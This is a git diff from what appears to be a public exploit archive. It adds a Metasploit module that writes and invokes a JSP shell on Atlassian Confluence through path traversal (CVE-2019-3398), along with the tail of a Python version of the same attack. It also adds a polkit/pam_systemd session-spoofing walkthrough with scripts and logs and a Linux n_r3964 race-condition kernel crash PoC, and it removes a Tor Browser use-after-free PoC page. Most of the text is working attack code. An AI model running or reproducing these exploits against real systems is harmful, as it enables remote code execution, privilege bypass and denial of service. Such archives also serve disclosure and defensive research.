+		pageid = soup.find('meta', {'name': 'ajs-draft-id'})['content']
+		pageid_pattern = re.compile("^(\d+)$")
+		if pageid_pattern.match(pageid):		
+			PAGEID = pageid
+			print 'Page ID created %s' % (pageid)
+			return 1
+		else:
+			print 'Unexpected Page ID format'
+			return 0
+	else:
+		print 'Page ID not created'
+		return 0	
+
+
+def main():
+	if do_authenticate() != 1:
+		exit()
+	
+	if PAGEID != '':
+		if PAGEID == '0':
+			spaces = do_getspaces()
+			for sp in spaces:
+				if do_createpage(sp) == 1:
+					if do_upload(PAGEID) != 1:
+						continue
+					if do_downloadall(PAGEID) != 1:
+						continue
+					else:
+						exit()
+			new_sp = do_createspace()
+			if new_sp != 0:
+				if do_createpage(new_sp) == 1:
+					if do_upload(PAGEID) != 1:
+						exit()
+					if do_downloadall(PAGEID) != 1:
+						exit()
+					exit()
+				else:
+					exit()
+			else:
+				exit()
+		if do_upload(PAGEID) != 1:
+			exit()
+		if do_downloadall(PAGEID) != 1:
+			exit()
+	else:
+		ID = PAGEID_RANGE_START
+		while ID <= PAGEID_RANGE_END:
+			print 'Trying Page Id %d' % (ID)
+			if do_upload(ID) == 1:
+				if do_downloadall(ID) == 1:
+					break
+			ID += 1
+
+if __name__ == "__main__":
+    main()
\ No newline at end of file
diff --git a/exploits/jsp/webapps/47635.rb b/exploits/jsp/webapps/47635.rb
new file mode 100755
index 000000000..d2f630a18
--- /dev/null
+++ b/exploits/jsp/webapps/47635.rb
@@ -0,0 +1,398 @@
+# Exploit Title: Atlassian Confluence 6.15.1 - Directory Traversal (Metasploit)
+# Google Dork: N/A
+# Date: 2019-11-11
+# Exploit Author: max7253
+# Vendor Homepage: https://www.atlassian.com
+# Software Link: https://www.atlassian.com/software/confluence/download-archives
+# Version: 6.15.1
+# Tested on: Microsoft Windows 7 Enterprise, 6.1.7601 Service Pack 1 Build 7601, Linux 5.0.0-23-generic #24~18.04.1-Ubuntu
+# CVE : N/A
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+include Msf::Exploit::Remote::HttpClient
+
+def initialize(info={})
+	super(update_info(info,
+	'Name'			=> "Confluence Arbitrary File Write via Path Traversal (CVE-2019-3398)",
+	'Description'		=> %q{
+	To use this exploit you should specify the following variables:
+	USERNAME and PASSWORD - the login/password to log into the web interface of the Atlassian Confluence server.
+	ROOTFOLDER - the root directory of the web server. If the root directory is located in C:\confluence\pages\, set this variable to ROOTFOLDER = 'confluence/pages/'.
+	Typical ROOTFOLDER locations are:
+	Windows: Program Files/Atlassian/Confluence/confluence/pages/
+	Linux: opt/atlassian/confluence/confluence/pages/
+	Note that the root directory of the web server and the temporary directory of the Atlassian Confluence server on Windows must be on the same drive (C:\ in the example above).
+	PAGEID - the pageId URL parameter you see in the browser address bar when you vist the Atlassian Confluence page where you have rights to upload files.
+	For example, https://server.net/pages/viewpageattachments.action?pageId=111111111&metadataLink=true.
+	If PAGEID is set to 0, the script will try to create a new Page ID. If it fails, it will try to create a new space and create a Page ID there.
+	If PAGEID is not specified, the script will walk though the PAGEID_RANGE_START..PAGEID_RANGE_END range.
+	The script gets authenticated to the Atlassian Confluence server, retrieves the ATLASSIAN TOKEN from the server response, uploads the shellcode, then imitates the 'Download all' action to place the shellcode to the root directory of the web server.
+	Tested on Atlassian v6.15.1. on Linux and Windows.
+	Note that on Linux Confluence runs under the 'confluence' account which may not have rights to save files in the root directory of the web server. In this case the exploit will fail. Also, to create a new space and get the list of existing spaces the script makes use of Confluence REST API, which is available starting from Confluence Server 5.5.
+	},
+	'License'			=> MSF_LICENSE,
+	'Author'			=>
+	[
+		'Maxim Guslyaev'      # Metasploit module
+	],
+	'References'		=>
+	[
+		[ 'CVE', '2019-3398' ],
+		[ 'URL', 'https://confluence.atlassian.com/doc/confluence-security-advisory-2019-04-17-968660855.html' ],
+		[ 'URL', 'https://devcentral.f5.com/s/articles/confluence-arbitrary-file-write-via-path-traversal-cve-2019-3398-34181'],
+		[ 'URL', 'https://nvd.nist.gov/vuln/detail/CVE-2019-3398']
+	],
+	'Privileged'		=> false,
+	'Platform'		=> %w{ linux win },
+	'Targets'			=>
+	[
+		[ 'Windows', { 'Platform' => 'win',   'Arch' => ARCH_JAVA  }],
+		[ 'Linux',   { 'Platform' => 'linux', 'Arch' => ARCH_JAVA  }]
+	],
+	'DefaultOptions'	=>
+	{
+		'RPORT' => 8090,
+		'SSL' => false
+	},
+	'DisclosureDate' => 'Nov 9 2019',
+	'DefaultTarget'  => 0
+	))
+
+	register_options(
+	[
+		OptString.new('USERNAME', [true, 'The login to log into the web interface of the Atlassian Confluence server', 'test']),        
+		OptString.new('PASSWORD', [true, 'The password to log into the web interface of the Atlassian Confluence server', 'test']),
+		OptString.new('ROOTFOLDER', [true, 'The root folder of the Atlassian Confluence server', 'Program Files/Atlassian/Confluence/confluence/pages/']),
+		#OptString.new('ROOTFOLDER', [true, 'The root folder of the Atlassian Confluence server', 'opt/atlassian/confluence/confluence/pages/']),
+		OptString.new('FILENAME', [true, 'The JSP shellcode file name', 'covfefe.jsp']),
+		OptString.new('TARGETURI', [true, 'The base to Confluence', '/']),
+		OptString.new('NEWSPACE', [false, 'A new space to be created', 'TESTSPACE432545645']),
+		OptInt.new('PAGEID', [false, 'A Page ID to be used to upload shellcode', 0]),
+		OptInt.new('PAGEID_RANGE_START', [false, 'The first Page ID to be used to enumerate a writable Page ID (used when PAGEID is not specified)', '1']),
+		OptInt.new('PAGEID_RANGE_END', [false, 'The last Page ID to be used to enumerate a writable Page ID (used when PAGEID is not specified)', '999999999']),
+		
+	], self.class)
+end
+
+def do_authenticate
+	print_status("Sending POST request to the web application (authentication)...")
+	res = send_request_cgi({
+		'uri'              => normalize_uri(target_uri.path.to_s, '/dologin.action'),
+		'method'           => 'POST',
+		'vars_post'        => {
+		'os_username'    => datastore['USERNAME'],
+		'os_password'    => datastore['PASSWORD'],
+		'os_destination' => '',
+		'login'          => 'Log+In'
+					}
+			})
+	if res.nil?
+		print_status("Unable to access the web application!")
+		return 0
+	end
+	@sessid = get_sid(res)
+	if @sessid.nil?
+		print_status("Unable to retrieve session ID!")
+		return 0
+	end
+	print_status("Getting Session ID from the web application... #{@sessid}")
+	
+	if res && res.redirect?
+		location = res.redirection
+		if location.nil?
+			print_status("Unable to access the web application when redirected!")
+			return 0
+		end
+		res = send_request_cgi!({
+		'uri'              => normalize_uri(target_uri.path.to_s, location.to_s),
+		'method'           => 'GET',
+		'headers'       => {
+		'Cookie'           => @sessid
+					}
+			}, redirect_depth = 5)
+	end
+
+	if res && res.code == 200
+		if res.body =~ /re-enter\syour\slogin/ || res.body =~ /Sorry,\syour\susername\sand\/or\spassword\sare\sincorrect/ || res.body =~ /Unauthorized/
+			print_status("Authentication failed...")
+			return 0
+		end
+
+		@xsrf_token = res.get_html_document.at('meta[@id="atlassian-token"]')['content']
+		if @xsrf_token.nil? or @xsrf_token.blank?
+			print_status("Failed to retrieve XSRF token...")
+			return 0
+		else
+			print_status("Retrieving XSRF token... #{@xsrf_token}")
+			return 1
+		end
+	else
+		print_status("Unexpected response from the web application...")
+		return 0
+	end
+end
+
+def do_upload(_pageid)
+	print_status("Sending POST request to the web application (shellcode upload)...")
+	res = send_request_cgi({
+		'uri'			=> normalize_uri(target_uri.path.to_s, '/plugins/drag-and-drop/upload.action'),
+		'method'		=> 'POST',
+		'vars_get'		=> {
+		'pageId'		=> _pageid,
+		'filename'		=> '../../../../../../../../../../' + datastore['ROOTFOLDER'] + datastore['FILENAME'],
+		'size'			=> payload.encoded.length,
+		'mimeType'		=> 'text/plain',
+		'spaceKey'		=> 'isis',
+		'atl_token'		=> @xsrf_token,
+		'name'			=> datastore['FILENAME']
+		},
+		'data'			=> payload.encoded,
+		'headers'		=> {
+          	'Connection'		=> 'close',
+		'Accept'		=> '*/*',
+		'Accept-Encoding'	=> 'identity',
+          	'Cookie'		=> @sessid,
+		'Content-Length'	=> payload.encoded.length,
+		'Content-Type'		=> 'text/plain'
+		}
+		})
+	if res && res.code == 200 && res.body.scan(/actionErrors/).blank?
+		print_status("Shellcode uploaded...")
+		return 1
+	else
+		return 0
+	end
+end
+
+def do_downloadall(_pageid)
+	for downloadall_iter in 1..10
+		print_status("Sending GET request to the web application (downloadall)...")
+		res = send_request_cgi({
+			'uri'			=> normalize_uri(target_uri.path.to_s, '/pages/downloadallattachments.action'),
+			'method'		=> 'GET',
+			'vars_get'		=> {
+			'pageId'		=> _pageid
+			},
+			'headers'		=> {
+          		'Cookie'		=> @sessid
+			}
+			})
+		
+		print_status("Sending GET request to the web application (shellcode invokation)...")
+		res = send_request_cgi({
+			'uri'			=> normalize_uri(target_uri.path.to_s, '/pages/' + datastore['FILENAME']),
+			'method'		=> 'GET',
+			'headers'		=> {
+          		'Cookie'		=> @sessid
+			}
+			}, timeout = 10)
+
+		if res && res.code == 200
+			print_status("Shellcode found...")
+			return 1
+		else
+			if downloadall_iter == 10
+				print_status("Shellcode not found...")
+				return 0
+			end
+		end
+	end
+end
+
+def do_getspaces
+	print_status("Sending GET request to the web application (getting available spaces)...")
+		res = send_request_cgi({
+			'uri'			=> normalize_uri(target_uri.path.to_s, '/rest/api/space'),
+			'method'		=> 'GET',
+			'headers'		=> {
+			'User-Agent'		=> 'python-requests/2.20.0',
+        		'Cookie'		=> @sessid,
+			'Accept'		=> '*/*',
+			'Accept-Encoding'	=> 'identity',
+			'Content-Type'		=> 'application/json'
+			}
+			})
+
+		if res && res.code == 200 && res.body =~ /results/
+			space_list = res.body.scan(/\"key\":\"(\w+)\"/).flatten
+		else
+			space_list = Array([])
+		end
+	return space_list
+end
+
+def do_createspace
+	print_status("Sending POST request to the web application (creating a space)...")
+	res = send_request_cgi({
+	'uri'			=> normalize_uri(target_uri.path.to_s, '/rest/api/space'),
+	'method'		=> 'POST',
+	'data'			=> {
+		"key": datastore['NEWSPACE'],
+		"name": "Example space",
+		"description": {
+		"plain": {
+		"value": "This is an example space",
+		"representation": "plain"
+		}
+		},
+		"metadata": {}
+		}.to_json,
+	'headers'		=> {
+	'User-Agent'		=> 'python-requests/2.20.0',
+        'Cookie'		=> @sessid,
+	'Accept-Encoding'	=> 'identity',
+	'Content-Type'		=> 'application/json'
+	}
+	})
+
+	if res && res.code == 200 && res.body =~ /\"key\":\"\w+\"/
+		print_status("Space created...")
+		return res.body.scan(/\"key\":\"(\w+)\"/).flatten[0]
+	else
+		print_status("Space not created...")
+		return 0
+	end			
+end
+
+def do_createpage(_space)
+	print_status("Sending GET request to the web application (creating Page ID), space #{_space}...")
+	res = send_request_cgi({
+		'uri'			=> normalize_uri(target_uri.path.to_s, '/pages/createpage.action?spaceKey='+_space),
+		'method'		=> 'GET',
+		'headers'		=> {
+        	'Cookie'		=> @sessid
+		}
+		})
+	if res && res.code == 200 && res.body =~ /ajs-draft-id/
+		pageid = res.get_html_document.at('meta[@name="ajs-draft-id"]')['content']
+		pageid_parsed = /(\d+)/.match(pageid)
+		if pageid_parsed.nil?
+			print_status("Unexpected Page ID format...")
+			return 0
+		else
+			print_status("Page ID created... #{pageid}")
+			datastore['PAGEID'] = pageid
+			return 1
+		end
+	else
+		return 0
+	end
+end
+
+def get_sid(res)
+	if res.nil?
+		return ''
+	end
+	res.get_cookies.scan(/(JSESSIONID=\w+);*/).flatten[0] || ''
+end
+
+
+def exploit
+	print_status("Getting authenticated to the web application...")
+	if do_authenticate != 1
+		fail_with(Failure::Unknown, 'Initial access or authentication error!')
+	end
+	
+	unless datastore['PAGEID'].blank?
+		if datastore['PAGEID'] == 0
+			print_status("Creating Page ID...")
+			spaces = do_getspaces
+			for sp in spaces
+				if do_createpage(sp) == 1
+					print_status("Uploading shellcode...")
+					if do_upload(datastore['PAGEID']) != 1
+						print_status("Failed to upload shellcode...")
+						next
+					end					
+					print_status("Invoking shellcode...")
+					if do_downloadall(datastore['PAGEID']) != 1
+						print_status("Failed to invoke shellcode...")
+						next
+					else
+						return
+					end
+				end
+			end
+
+			print_status("Trying to create a new space...")
+			new_sp = do_createspace
+
+			if new_sp != 0
+				if do_createpage(new_sp) == 1
+					print_status("Uploading shellcode...")
+					if do_upload(datastore['PAGEID']) != 1
+						fail_with(Failure::Unknown, 'Error while uploading shellcode!')
+					end
+					print_status("Invoking shellcode...")
+					if do_downloadall(datastore['PAGEID']) != 1
+						fail_with(Failure::Unknown, 'Error while invoking shellcode!')				
+					end
+
+					return
+				else
+					fail_with(Failure::Unknown, 'Error while creating page in the newly created space!')
+				end
+			else
+				fail_with(Failure::Unknown, 'Error while creating space!')
+			end
+		end	
+			
+		print_status("Uploading shellcode...")
+		if do_upload(datastore['PAGEID']) != 1
+			fail_with(Failure::Unknown, 'Error while uploading shellcode!')
+		end
+		print_status("Invoking shellcode...")
+		if do_downloadall(datastore['PAGEID']) != 1
+			fail_with(Failure::Unknown, 'Error while invoking shellcode!')				
+		end
+	else
+		for id in datastore['PAGEID_RANGE_START']..datastore['PAGEID_RANGE_END']
+			print_status("Trying Page Id #{id}")
+			print_status("Uploading shellcode...")
+			if do_upload(id) == 1
+				print_status("Invoking shellcode...")
+				if do_downloadall(id) == 1
+					break
+				end
+			end
+		end
+	end
+
+end
+
+def check
+	res = send_request_cgi!({
+		'uri'			=> normalize_uri(target_uri.path.to_s, '/login.action?anon=1&logout=1'),
+		'method'		=> 'GET',
+		}, redirect_depth = 5)
+
+	if res && res.body =~ /Powered\sby/
+		ver = res.body.scan(/^.*Powered\sby\s.*(\d{1,}\.\d{1,}\.\d{1,}).*$/).flatten[0]
+		print_status("The version of the web application is #{ver}")
+		ver_parsed = /(\d+)\.(\d+)\.(\d+)/.match(ver.to_s)
+		if ver_parsed.nil?
+			print_status("The version of the web application couldn't be parsed")
+			return Exploit::CheckCode::Detected
+		end
+		ver_oct1 = ver_parsed[1].to_i
+		ver_oct2 = ver_parsed[2].to_i
+		ver_oct3 = ver_parsed[3].to_i
+		
+		if ver_oct1.between?(2, 6) && ver_oct2.between?(0, 6) && ver_oct3.between?(0, 12) || ver_oct1.between?(6, 6) && ver_oct2.between?(7, 12) && ver_oct3.between?(0, 3) || ver_oct1.between?(6, 6) && ver_oct2.between?(13, 13) && ver_oct3.between?(0, 3) || ver_oct1.between?(6, 6) && ver_oct2.between?(14, 14) && ver_oct3.between?(0, 2) || ver_oct1.between?(6, 6) && ver_oct2.between?(15, 15) && ver_oct3.between?(0, 1)
+			return Exploit::CheckCode::Appears
+		else
+			return Exploit::CheckCode::Safe		
+		end
+
+	else
+		return Exploit::CheckCode::Unknown
+	end
+end
+
+end
\ No newline at end of file
diff --git a/exploits/linux/dos/44994.html b/exploits/linux/dos/44994.html
deleted file mode 100644
index 900743d93..000000000
--- a/exploits/linux/dos/44994.html
+++ /dev/null
@@ -1,30 +0,0 @@
-# Exploit Title: Tor Browser - Use After Free (PoC)
-# Date: 09.07.2018
-# Exploit Author: t4rkd3vilz
-# Vendor Homepage: https://www.torproject.org/ 
-# Software Link: https://www.torproject.org/download/download-easy.html.en
-# Version: Tor 0.3.2.x before 0.3.2.10
-# Tested on: Kali Linux
-# CVE : CVE-2018-0491
-
-#Run exploit, result DOS
-
-
-<!DOCTYPE html>
-<html>
-<title>veryhandsome jameel naboo</title>
-<body>
-<script>
-function send()
-{
-try { document.body.contentEditable = 'true'; } catch(e){}
-try { var e0 = document.createElement("frameset"); } catch(e){}
-try { document.body.appendChild(e0); } catch(e){}
-try { e0.appendChild(document.createElement("BBBBBBBBBBBBBBB")); } catch(e){}
-try {
-e0.addEventListener("DOMAttrModified",function(){document.execCommand("SelectAll");e0['bo
-rder']='-4400000000';}, false); e0.focus();} catch(e){}
-try { e0.setAttribute('iframe'); } catch(e){}
-try { document.body.insertBefore(e0); } catch(e){}
-}
-send();</script></html>
\ No newline at end of file
diff --git a/exploits/linux/dos/46743.txt b/exploits/linux/dos/46743.txt
new file mode 100644
index 000000000..31d83d4f9
--- /dev/null
+++ b/exploits/linux/dos/46743.txt
@@ -0,0 +1,243 @@
+As documented at
+<https://www.freedesktop.org/software/polkit/docs/latest/polkit.8.html>, for
+any action, a polkit policy can specify separate levels of required
+authentication based on whether a client is:
+
+ - in an active session on a local console
+ - in an inactive session on a local console
+ - or neither
+
+This is expressed in the policy using the elements "allow_any",
+"allow_inactive" and "allow_active". Very roughly speaking, the idea here is
+to give special privileges to processes owned by users that are sitting
+physically in front of the machine (or at least, a keyboard and a screen that
+are connected to a machine), and restrict processes that e.g. belong to users
+that are ssh'ing into a machine.
+
+For example, the ability to refresh the system's package index is restricted
+this way using a policy in
+/usr/share/polkit-1/actions/org.freedesktop.packagekit.policy:
+
+  <action id="org.freedesktop.packagekit.system-sources-refresh">
+[...]
+    <description>Refresh system repositories</description>
+[...]
+    <message>Authentication is required to refresh the system repositories</message>
+[...]
+    <defaults>
+      <allow_any>auth_admin</allow_any>
+      <allow_inactive>auth_admin</allow_inactive>
+      <allow_active>yes</allow_active>
+    </defaults>
+  </action>
+
+
+On systems that use systemd-logind, polkit determines whether a session is
+associated with a local console by checking whether systemd-logind is tracking
+the session as being associated with a "seat". This happens through
+polkit_backend_session_monitor_is_session_local() in
+polkitbackendsessionmonitor-systemd.c, which calls sd_session_get_seat().
+The check whether a session is active works similarly.
+
+systemd-logind is informed about the creation of new sessions by the PAM
+module pam_systemd through a systemd message bus call from
+pam_sm_open_session() to method_create_session(). The RPC method trusts the
+information supplied to it, apart from some consistency checks; that is not
+directly a problem, since this RPC method can only be invoked by root.
+This means that the PAM module needs to ensure that it doesn't pass incorrect
+data to systemd-logind.
+
+Looking at the code in the PAM module, however, you can see that the seat name
+of the session and the virtual terminal number come from environment
+variables:
+
+        seat = getenv_harder(handle, "XDG_SEAT", NULL);
+        cvtnr = getenv_harder(handle, "XDG_VTNR", NULL);
+        type = getenv_harder(handle, "XDG_SESSION_TYPE", type_pam);
+        class = getenv_harder(handle, "XDG_SESSION_CLASS", class_pam);
+        desktop = getenv_harder(handle, "XDG_SESSION_DESKTOP", desktop_pam);
+
+This is actually documented at
+<https://www.freedesktop.org/software/systemd/man/pam_systemd.html#Environment>.
+
+After some fixup logic that is irrelevant here, this data is then passed to
+the RPC method.
+
+
+One quirk of this issue is that a new session is only created if the calling
+process is not already part of a session (based on the cgroups it is in,
+parsed from procfs). This means that an attacker can't simply ssh into a
+machine, set some environment variables, and then invoke a setuid binary that
+uses PAM (such as "su") because ssh already triggers creation of a session via
+PAM. But as it turns out, the systemd PAM module is only invoked for
+interactive sessions:
+
+# cat /usr/share/pam-configs/systemd
+Name: Register user sessions in the systemd control group hierarchy
+Default: yes
+Priority: 0
+Session-Interactive-Only: yes
+Session-Type: Additional
+Session:
+    optional pam_systemd.so
+
+So, under the following assumptions:
+
+ - we can run commands on the remote machine, e.g. via SSH
+ - our account can be used with "su" (it has a password and isn't disabled)
+ - the machine has no X server running and is currently displaying tty1, with
+   a login prompt
+
+we can have our actions checked against the "allow_active" policies instead of
+the "allow_any" policies as follows:
+
+ - SSH into the machine
+ - use "at" to schedule a job in one minute that does the following:
+   * wipe the environment
+   * set XDG_SEAT=seat0 and XDG_VTNR=1
+   * use "expect" to run "su -c {...} {our_username}" and enter our user's
+     password
+   * in the shell invoked by "su", perform the action we want to run under the
+     "allow_active" policy
+
+
+I tested this in a Debian 10 VM, as follows ("{{{...}}}" have been replaced),
+after ensuring that no sessions are active and the VM's screen is showing the
+login prompt on tty1; all following commands are executed over SSH:
+
+
+=====================================================================
+normal_user@deb10:~$ cat session_outer.sh 
+#!/bin/sh
+echo "===== OUTER TESTING PKCON" >/tmp/atjob.log
+pkcon refresh -p </dev/null >>/tmp/atjob.log
+env -i /home/normal_user/session_middle.sh
+normal_user@deb10:~$ cat session_middle.sh 
+#!/bin/sh
+export XDG_SEAT=seat0
+export XDG_VTNR=1
+
+echo "===== ENV DUMP =====" > /tmp/atjob.log
+env >> /tmp/atjob.log
+
+echo "===== SESSION_OUTER =====" >> /tmp/atjob.log
+cat /proc/self/cgroup >> /tmp/atjob.log
+
+echo "===== OUTER LOGIN STATE =====" >> /tmp/atjob.log
+loginctl --no-ask-password >> /tmp/atjob.log
+
+echo "===== MIDDLE TESTING PKCON" >>/tmp/atjob.log
+pkcon refresh -p </dev/null >>/tmp/atjob.log
+
+/home/normal_user/runsu.expect
+
+echo "=========================" >> /tmp/atjob.log
+normal_user@deb10:~$ cat runsu.expect 
+#!/usr/bin/expect
+spawn /bin/su -c "/home/normal_user/session_inner.sh" normal_user
+expect "Password: "
+send "{{{PASSWORD}}}\n"
+expect eof
+
+normal_user@deb10:~$ cat session_inner.sh 
+#!/bin/sh
+echo "===== INNER LOGIN STATE =====" >> /tmp/atjob.log
+loginctl --no-ask-password >> /tmp/atjob.log
+
+echo "===== SESSION_INNER =====" >> /tmp/atjob.log
+cat /proc/self/cgroup >> /tmp/atjob.log
+
+echo "===== INNER TESTING PKCON" >>/tmp/atjob.log
+pkcon refresh -p </dev/null >>/tmp/atjob.log
+
+normal_user@deb10:~$ loginctl
+SESSION  UID USER        SEAT TTY  
+      7 1001 normal_user      pts/0
+
+1 sessions listed.
+normal_user@deb10:~$ pkcon refresh -p </dev/null
+Transaction:	Refreshing cache
+Status: 	Waiting in queue
+Status: 	Waiting for authentication
+Status: 	Finished
+Results:
+Fatal error: Failed to obtain authentication.
+normal_user@deb10:~$ at -f /home/normal_user/session_outer.sh {{{TIME}}}
+warning: commands will be executed using /bin/sh
+job 25 at {{{TIME}}}
+{{{ wait here until specified time has been reached, plus time for the job to finish running}}}
+normal_user@deb10:~$ cat /tmp/atjob.log 
+===== ENV DUMP =====
+XDG_SEAT=seat0
+XDG_VTNR=1
+PWD=/home/normal_user
+===== SESSION_OUTER =====
+10:memory:/system.slice/atd.service
+9:freezer:/
+8:pids:/system.slice/atd.service
+7:perf_event:/
+6:devices:/system.slice/atd.service
+5:net_cls,net_prio:/
+4:cpuset:/
+3:blkio:/
+2:cpu,cpuacct:/
+1:name=systemd:/system.slice/atd.service
+0::/system.slice/atd.service
+===== OUTER LOGIN STATE =====
+SESSION  UID USER        SEAT TTY  
+      7 1001 normal_user      pts/0
+
+1 sessions listed.
+===== MIDDLE TESTING PKCON
+Transaction:	Refreshing cache
+Status: 	Waiting in queue
+Status: 	Waiting for authentication
+Status: 	Finished
+Results:
+Fatal error: Failed to obtain authentication.
+===== INNER LOGIN STATE =====
+SESSION  UID USER        SEAT  TTY  
+     18 1001 normal_user seat0 pts/1
+      7 1001 normal_user       pts/0
+
+2 sessions listed.
+===== SESSION_INNER =====
+10:memory:/user.slice/user-1001.slice/session-18.scope
+9:freezer:/
+8:pids:/user.slice/user-1001.slice/session-18.scope
+7:perf_event:/
+6:devices:/user.slice
+5:net_cls,net_prio:/
+4:cpuset:/
+3:blkio:/
+2:cpu,cpuacct:/
+1:name=systemd:/user.slice/user-1001.slice/session-18.scope
+0::/user.slice/user-1001.slice/session-18.scope
+===== INNER TESTING PKCON
+Transaction:	Refreshing cache
+Status: 	Waiting in queue
+Status: 	Waiting for authentication
+Status: 	Waiting in queue
+Status: 	Starting
+Status: 	Loading cache
+Percentage:	0
+Percentage:	50
+Percentage:	100
+Percentage:	0
+Percentage:	50
+Percentage:	100
+Status: 	Refreshing software list
+Status: 	Downloading packages
+Percentage:	0
+Status: 	Running
+Status: 	Loading cache
+Percentage:	100
+Status: 	Finished
+Results:
+ Enabled                              http://ftp.ch.debian.org/debian buster InRelease
+ Enabled                              http://security.debian.org/debian-security buster/updates InRelease
+ Enabled                              http://debug.mirrors.debian.org/debian-debug buster-debug InRelease
+=========================
+You have new mail in /var/mail/normal_user
+normal_user@deb10:~$ 
+=====================================================================
\ No newline at end of file
diff --git a/exploits/linux/dos/46744.c b/exploits/linux/dos/46744.c
new file mode 100644
index 000000000..f074a0f0d
--- /dev/null
+++ b/exploits/linux/dos/46744.c
@@ -0,0 +1,192 @@
+/*
+The Siemens R3964 line discipline code in drivers/tty/n_r3964.c has a few races
+around its ioctl handler; for example, the handler for R3964_ENABLE_SIGNALS
+just allocates and deletes elements in a linked list with zero locking.
+This code is reachable by an unprivileged user if the line discipline is enabled
+in the kernel config; Ubuntu 18.04, for example, ships this line discipline as a
+module.
+
+Proof of concept:
+
+==================================
+user@ubuntu-18-04-vm:~/r3964$ cat r3964_racer.c
+*/
+
+#define _GNU_SOURCE
+#include <pthread.h>
+#include <fcntl.h>
+#include <sys/ioctl.h>
+#include <stdio.h>
+#include <err.h>
+#include <stdlib.h>
+#include <linux/n_r3964.h>
+
+static int ptm_fd, slave_fd;
+
+static void *thread_fn(void *dummy) {
+  int res;
+  while (1) {
+    res = ioctl(slave_fd, R3964_ENABLE_SIGNALS, R3964_SIG_ALL);
+    printf("R3964_ENABLE_SIGNALS: %d\n", res);
+    res = ioctl(slave_fd, R3964_ENABLE_SIGNALS, 0);
+    printf("R3964_ENABLE_SIGNALS: %d\n", res);
+  }
+}
+
+int main(void) {
+  ptm_fd = getpt();
+  if (ptm_fd == -1) err(1, "getpt");
+  if (unlockpt(ptm_fd)) err(1, "unlockpt");
+  slave_fd = ioctl(ptm_fd, TIOCGPTPEER, O_RDWR);
+  if (slave_fd == -1) err(1, "TIOCGPTPEER");
+
+  printf("-----------------------------------------\n");
+  system("ls -l /proc/$PPID/fd");
+  printf("-----------------------------------------\n");
+
+  const int disc_r3964 = N_R3964;
+  if (ioctl(slave_fd, TIOCSETD, &disc_r3964)) err(1, "TIOCSETD");
+
+  pthread_t thread;
+  if (pthread_create(&thread, NULL, thread_fn, NULL)) errx(1, "pthread_create");
+
+  thread_fn(NULL);
+
+  return 0;
+}
+
+/*
+user@ubuntu-18-04-vm:~/r3964$ gcc -o r3964_racer r3964_racer.c -pthread && ./r3964_racer
+[...]
+==================================
+
+dmesg splat:
+
+==================================
+[   82.646953] r3964: Philips r3964 Driver $Revision: 1.10 $
+[   82.656459] ------------[ cut here ]------------
+[   82.656461] kernel BUG at /build/linux-Y38gIP/linux-4.15.0/mm/slub.c:296!
+[   82.658396] invalid opcode: 0000 [#1] SMP PTI
+[   82.659515] Modules linked in: n_r3964 joydev ipt_MASQUERADE nf_nat_masquerade_ipv4 nf_conntrack_netlink nfnetlink xfrm_user xfrm_algo iptable_nat nf_conntrack_ipv4 nf_defrag_ipv4 nf_nat_ipv4 xt_addrtype iptable_filter xt_conntrack nf_nat nf_conntrack libcrc32c br_netfilter bridge stp llc aufs overlay snd_hda_codec_generic crct10dif_pclmul crc32_pclmul snd_hda_intel snd_hda_codec snd_hda_core snd_hwdep ghash_clmulni_intel snd_pcm snd_seq_midi snd_seq_midi_event pcbc aesni_intel aes_x86_64 snd_rawmidi snd_seq snd_seq_device snd_timer snd crypto_simd glue_helper cryptd input_leds soundcore mac_hid 9pnet_virtio 9pnet serio_raw qemu_fw_cfg sch_fq_codel parport_pc ppdev lp parport ip_tables x_tables autofs4 virtio_gpu ttm floppy drm_kms_helper psmouse syscopyarea sysfillrect sysimgblt fb_sys_fops drm
+[   82.677770]  virtio_net i2c_piix4 pata_acpi
+[   82.678849] CPU: 1 PID: 2209 Comm: r3964_racer Not tainted 4.15.0-42-generic #45-Ubuntu
+[   82.680897] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.10.2-1 04/01/2014
+[   82.683098] RIP: 0010:kfree+0x16a/0x180
+[   82.684116] RSP: 0018:ffffb6b381d7fd50 EFLAGS: 00010246
+[   82.685454] RAX: ffff9bb0b4770000 RBX: ffff9bb0b4770000 RCX: ffff9bb0b4770000
+[   82.687285] RDX: 0000000000006e86 RSI: ffff9bb1bfca70a0 RDI: ffff9bb1bb003800
+[   82.689247] RBP: ffffb6b381d7fd68 R08: ffffffffc0511db0 R09: ffffffffc051202c
+[   82.691077] R10: ffffeb8c80d1dc00 R11: 0000000000000000 R12: ffff9bb1b3430e40
+[   82.692906] R13: ffffffffc051202c R14: ffff9bb13b56e800 R15: ffff9bb12d1addd0
+[   82.694726] FS:  00007ff9b92da740(0000) GS:ffff9bb1bfc80000(0000) knlGS:0000000000000000
+[   82.696801] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
+[   82.698421] CR2: 0000558cf9e32ec8 CR3: 00000000a513a005 CR4: 00000000003606e0
+[   82.700259] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
+[   82.702113] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
+[   82.703946] Call Trace:
+[   82.704602]  r3964_ioctl+0x27c/0x2b0 [n_r3964]
+[   82.705746]  tty_ioctl+0x138/0x8c0
+[   82.706631]  ? __wake_up+0x13/0x20
+[   82.707516]  do_vfs_ioctl+0xa8/0x630
+[   82.708610]  ? vfs_write+0x166/0x1a0
+[   82.709543]  SyS_ioctl+0x79/0x90
+[   82.710405]  do_syscall_64+0x73/0x130
+[   82.711357]  entry_SYSCALL_64_after_hwframe+0x3d/0xa2
+[   82.712659] RIP: 0033:0x7ff9b8bd45d7
+[   82.713680] RSP: 002b:00007fffcd85bcf8 EFLAGS: 00000202 ORIG_RAX: 0000000000000010
+[   82.715617] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007ff9b8bd45d7
+[   82.717463] RDX: 0000000000000000 RSI: 0000000000005301 RDI: 0000000000000004
+[   82.719411] RBP: 00007fffcd85bd20 R08: 0000000000000000 R09: 0000000000000000
+[   82.721248] R10: 0000000000000000 R11: 0000000000000202 R12: 0000556df58ed820
+[   82.723093] R13: 00007fffcd85be30 R14: 0000000000000000 R15: 0000000000000000
